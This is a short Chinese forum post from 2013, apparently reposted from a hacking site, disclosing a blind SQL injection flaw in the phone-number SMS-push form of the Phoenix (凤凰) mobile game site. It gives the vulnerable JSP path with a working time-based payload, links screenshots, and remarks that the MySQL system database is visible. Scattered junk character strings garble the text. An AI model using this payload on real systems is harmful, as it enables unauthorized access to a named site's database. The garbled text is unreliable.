简要描述:
2 Q- W& \! K* x8 u" I X凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。# ^( s1 f3 k q; n( G
' b' j+ d/ I* V9 H
详细说明:2 _$ Z7 F2 s9 D; b: A! j
存在SQL盲注url:, X2 ~# l6 Z, I3 C7 D V/ W' p
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
* z, P; K* B+ f. F& Jhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png- @. ]7 G n1 ^1 m5 w {* P
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png! p* {# S; e2 i0 A8 t" l. X
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
" U! A- i0 u b" R0 T3 a, n) {9 ]# k5 a( S; [# L
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对